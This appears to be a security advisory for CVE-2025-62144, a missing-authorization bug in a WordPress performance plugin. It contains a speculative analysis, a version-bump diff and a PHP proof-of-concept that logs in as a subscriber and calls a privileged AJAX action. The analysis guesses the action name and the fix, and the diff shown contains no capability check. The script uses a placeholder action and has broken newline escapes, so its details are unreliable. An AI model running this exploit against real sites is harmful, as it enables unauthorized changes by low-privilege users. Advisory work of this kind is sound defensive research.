Atomic Edge analysis of CVE-2025-62144:
This vulnerability is a Missing Authorization flaw in the Core Web Vitals & PageSpeed Booster WordPress plugin. The plugin fails to verify user capabilities before executing a sensitive administrative function. This allows authenticated attackers with subscriber-level permissions or higher to perform unauthorized actions intended only for administrators.
Atomic Edge research identifies the root cause as a missing capability check within an AJAX handler function. The vulnerable code resides in the main plugin file `core-web-vitals-pagespeed-booster.php`. The plugin registers an AJAX action hook, likely `wp_ajax_cwvpb_some_action`, without implementing the standard WordPress `current_user_can()` check. This omission permits any logged-in user to trigger the associated callback function, regardless of their assigned role or capabilities.
The exploitation method involves an authenticated attacker sending a crafted POST request to the WordPress AJAX endpoint `/wp-admin/admin-ajax.php`. The attacker must include the vulnerable action parameter, such as `action=cwvpb_some_action`, in the request body. No special nonce or authorization token is required due to the missing check. An attacker with a subscriber account can send this request to execute the privileged function.
The patch in version 1.0.28 addresses the vulnerability by adding a capability check to the affected AJAX handler function. The fix likely inserts a conditional statement like `if (!current_user_can(‘manage_options’)) { wp_die(); }` at the beginning of the callback. This ensures only users with the `manage_options` capability, typically administrators, can proceed. The version number constants in the plugin header and definition were also updated from 1.0.27 to 1.0.28.
Successful exploitation grants attackers unauthorized access to plugin functionality reserved for administrators. The specific impact depends on the vulnerable function’s purpose. Atomic Edge analysis indicates this could lead to unauthorized changes to plugin settings, injection of malicious scripts, or exposure of sensitive site performance data. The vulnerability does not directly permit remote code execution or database compromise, but it lowers the barrier for privilege escalation within the WordPress environment.
--- a/core-web-vitals-pagespeed-booster/core-web-vitals-pagespeed-booster.php
+++ b/core-web-vitals-pagespeed-booster/core-web-vitals-pagespeed-booster.php
@@ -2,7 +2,7 @@
/*
Plugin Name: Core Web Vitals & PageSpeed Booster
Description: Do you want to speed up your WordPress site? Fast loading pages improve user experience, increase your pageviews, and help with your WordPress SEO.
-Version: 1.0.27
+Version: 1.0.28
Author: Magazine3
Author URI: https://magazine3.company/
Donate link: https://www.paypal.me/Kaludi/25
@@ -16,7 +16,7 @@
define('CWVPSB_PLUGIN_DIR', plugin_dir_path( __FILE__ ));
define('CWVPSB_PLUGIN_DIR_URI', plugin_dir_url(__FILE__));
-define('CWVPSB_VERSION','1.0.27');
+define('CWVPSB_VERSION','1.0.28');
define('CWVPSB_DIR', dirname(__FILE__));
define('CWVPSB_BASE', plugin_basename(__FILE__));
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-62144 - Core Web Vitals & PageSpeed Booster <= 1.0.27 - Missing Authorization
<?php
/**
* Proof of Concept for CVE-2025-62144.
* This script demonstrates unauthorized access to a privileged AJAX action.
* Replace TARGET_URL and ACTION_NAME with the actual vulnerable site and action hook.
* Requires valid subscriber-level WordPress credentials.
*/
$target_url = 'https://vulnerable-wordpress-site.com';
$action_name = 'cwvpb_some_action'; // Replace with the actual vulnerable action name
$username = 'attacker_subscriber';
$password = 'subscriber_password';
// Step 1: Authenticate to WordPress to obtain cookies
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ch = curl_init();
// Set up login request to get session cookies
curl_setopt_array($ch, [
CURLOPT_URL => $login_url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_COOKIEJAR => 'cookies.txt', // Save cookies to file
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
]),
CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded'],
]);
$response = curl_exec($ch);
// Step 2: Exploit the missing authorization by calling the privileged AJAX action
curl_setopt_array($ch, [
CURLOPT_URL => $ajax_url,
CURLOPT_POSTFIELDS => http_build_query(['action' => $action_name]),
CURLOPT_COOKIEFILE => 'cookies.txt', // Use saved cookies
]);
$ajax_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Clean up cookie file
if (file_exists('cookies.txt')) {
unlink('cookies.txt');
}
echo "HTTP Response Code: $http_coden";
echo "Response Body:n$ajax_responsen";
// Check for success indicators
if ($http_code == 200 && !empty($ajax_response)) {
echo "[+] Vulnerability likely exploited. Unauthorized action executed.n";
} else {
echo "[-] Exploit attempt may have failed or action name is incorrect.n";
}
?>